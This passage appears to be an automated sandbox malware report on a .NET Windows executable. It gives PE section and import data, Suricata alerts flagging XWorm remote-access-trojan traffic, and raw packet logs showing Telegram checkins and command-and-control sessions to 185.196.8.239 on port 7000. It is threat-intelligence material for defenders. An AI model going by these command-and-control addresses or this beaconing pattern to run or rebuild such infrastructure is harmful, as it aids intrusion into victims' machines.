                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000x357a040x357c00c6e0fa529647ba2c45f66eb99c32a565unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0x35a0000x4f00x600a9d82a0f2d35672e1ff9f7c6ffc523ebFalse0.3795572916666667data3.803200380192977IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .reloc0x35c0000xc0x20016df37463a82b6da56900d9e0a61a11dFalse0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_VERSION0x35a0a00x264data0.46405228758169936
                                                                                        RT_MANIFEST0x35a3040x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                        Imports

                                                                                        DLLImport
                                                                                        mscoree.dll_CorExeMain

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-05T19:40:35.861908+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.449740149.154.167.220443TCP
                                                                                        2024-12-05T19:40:48.866202+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:40:49.279298+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:40:49.322470+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:41:01.792137+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:41:01.794410+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:41:06.078519+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:41:06.078519+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:41:14.306493+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:41:14.308474+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:41:26.820479+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:41:26.822739+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:41:36.074500+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:41:36.074500+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:41:39.346854+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:41:39.348559+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:41:44.039426+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:41:44.042422+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:41:44.186711+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:41:44.189182+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:41:44.354657+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:41:44.357039+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:41:49.930287+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:41:49.932460+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:41:50.493925+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:41:50.504394+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:41:50.604514+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:41:50.627833+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:41:50.797977+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:41:50.917747+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:41:55.895664+01002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:41:56.183674+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:41:56.186173+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:41:56.328908+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:41:56.331341+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:41:56.498022+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:41:56.501294+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:42:06.073461+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:42:06.073461+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:42:08.885531+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:42:08.887117+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:42:12.117835+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:42:12.119563+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:42:22.726539+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:42:22.728656+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:42:22.868735+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:42:22.871805+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:42:23.040475+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:42:23.043784+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:42:23.183664+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:42:23.186431+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:42:26.601407+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:42:26.604303+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:42:28.023630+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:42:28.025141+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:42:33.680034+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:42:33.682516+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:42:36.096593+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:42:36.096593+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:42:38.227034+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:42:38.229933+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:42:38.418978+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:42:38.420604+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:42:43.696326+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:42:43.704189+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:42:43.888449+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:42:44.119844+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:42:46.372475+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:42:46.375024+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:42:58.883827+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:42:58.890884+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:04.245042+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:04.246700+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:04.437499+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:04.438814+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:05.040102+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:05.042164+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:06.096583+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:06.096583+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:14.274398+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:14.276672+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:14.415537+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:14.417228+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:14.594513+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:14.596237+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:14.834543+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:14.839916+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:22.322408+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:22.324503+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:24.696129+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:24.698239+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:29.688528+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:29.693242+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:29.881428+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:29.883678+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:36.090598+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:36.090598+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:40.196613+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:40.201444+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:41.339455+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:41.341754+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:42.024594+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:42.026533+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:54.541105+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:54.547027+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:56.823146+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:56.828046+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:43:57.103007+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:43:57.108010+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP
                                                                                        2024-12-05T19:44:06.093314+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:44:06.093314+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:44:08.658761+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1185.196.8.2397000192.168.2.449742TCP
                                                                                        2024-12-05T19:44:08.659555+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449742185.196.8.2397000TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 5, 2024 19:40:01.995919943 CET4973080192.168.2.4208.95.112.1
                                                                                        Dec 5, 2024 19:40:02.116771936 CET8049730208.95.112.1192.168.2.4
                                                                                        Dec 5, 2024 19:40:02.116842985 CET4973080192.168.2.4208.95.112.1
                                                                                        Dec 5, 2024 19:40:02.117707014 CET4973080192.168.2.4208.95.112.1
                                                                                        Dec 5, 2024 19:40:02.237591982 CET8049730208.95.112.1192.168.2.4
                                                                                        Dec 5, 2024 19:40:03.304946899 CET8049730208.95.112.1192.168.2.4
                                                                                        Dec 5, 2024 19:40:03.347439051 CET4973080192.168.2.4208.95.112.1
                                                                                        Dec 5, 2024 19:40:33.851852894 CET49740443192.168.2.4149.154.167.220
                                                                                        Dec 5, 2024 19:40:33.851895094 CET44349740149.154.167.220192.168.2.4
                                                                                        Dec 5, 2024 19:40:33.852011919 CET49740443192.168.2.4149.154.167.220
                                                                                        Dec 5, 2024 19:40:33.871160984 CET49740443192.168.2.4149.154.167.220
                                                                                        Dec 5, 2024 19:40:33.871187925 CET44349740149.154.167.220192.168.2.4
                                                                                        Dec 5, 2024 19:40:35.243087053 CET44349740149.154.167.220192.168.2.4
                                                                                        Dec 5, 2024 19:40:35.243175030 CET49740443192.168.2.4149.154.167.220
                                                                                        Dec 5, 2024 19:40:35.245450020 CET49740443192.168.2.4149.154.167.220
                                                                                        Dec 5, 2024 19:40:35.245455027 CET44349740149.154.167.220192.168.2.4
                                                                                        Dec 5, 2024 19:40:35.245825052 CET44349740149.154.167.220192.168.2.4
                                                                                        Dec 5, 2024 19:40:35.296448946 CET49740443192.168.2.4149.154.167.220
                                                                                        Dec 5, 2024 19:40:35.343333960 CET44349740149.154.167.220192.168.2.4
                                                                                        Dec 5, 2024 19:40:35.861960888 CET44349740149.154.167.220192.168.2.4
                                                                                        Dec 5, 2024 19:40:35.862073898 CET44349740149.154.167.220192.168.2.4
                                                                                        Dec 5, 2024 19:40:35.867651939 CET49740443192.168.2.4149.154.167.220
                                                                                        Dec 5, 2024 19:40:35.882343054 CET49740443192.168.2.4149.154.167.220
                                                                                        Dec 5, 2024 19:40:36.187557936 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:40:36.307568073 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:40:36.307650089 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:40:36.357579947 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:40:36.477538109 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:40:48.866202116 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:40:48.988234997 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:40:49.279298067 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:40:49.322469950 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:40:49.442348957 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:01.382441044 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:01.502264023 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:01.792136908 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:01.794409990 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:01.915745020 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:06.078519106 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:06.316313028 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:13.895421028 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:14.015795946 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:14.306493044 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:14.308474064 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:14.429714918 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:19.101371050 CET8049730208.95.112.1192.168.2.4
                                                                                        Dec 5, 2024 19:41:19.101439953 CET4973080192.168.2.4208.95.112.1
                                                                                        Dec 5, 2024 19:41:26.410706043 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:26.530697107 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:26.820478916 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:26.822738886 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:26.942806005 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:36.074500084 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:36.128921986 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:38.926145077 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:39.046004057 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:39.346853971 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:39.348558903 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:39.471750021 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:43.394783974 CET4973080192.168.2.4208.95.112.1
                                                                                        Dec 5, 2024 19:41:43.514779091 CET8049730208.95.112.1192.168.2.4
                                                                                        Dec 5, 2024 19:41:43.629508018 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:43.749242067 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:43.749310017 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:43.869107962 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:43.869158983 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:43.988946915 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:44.039426088 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:44.042422056 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:44.162599087 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:44.186711073 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:44.189182043 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:44.353354931 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:44.354656935 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:44.357038975 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:44.477087975 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:49.519803047 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:49.639518976 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:49.930286884 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:49.932460070 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:50.052314997 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:50.052375078 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:50.172205925 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:50.172277927 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:50.292128086 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:50.292351961 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:50.412225008 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:50.493925095 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:50.504394054 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:50.604513884 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:50.624514103 CET700049742185.196.8.239192.168.2.4
